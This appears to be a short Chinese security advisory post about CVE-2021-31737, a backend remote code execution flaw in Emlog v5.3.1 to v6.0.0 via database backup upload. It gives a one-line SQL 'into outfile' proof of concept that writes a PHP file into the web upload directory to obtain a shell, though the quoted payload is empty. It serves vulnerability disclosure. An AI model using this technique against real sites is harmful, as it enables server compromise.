# Emlog v5.3.1 – v6.0.0 后台 RCE(CVE-2021-31737)
由于在admin/data.php中上传了数据库备份文件,因此emlog v5.3.1和emlog v6.0.0具有远程执行代码漏洞。
影响版本:
* Emlog v5.3.1
* Emlog v6.0.0
PoC:
“`
select “” into outfile “/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php”;
“`
通过在后台数据-备份数据库进行构造恶意sql语句进行备份上传-getshell
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2021-31737
* https://github.com/emlog/emlog/issues/82
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容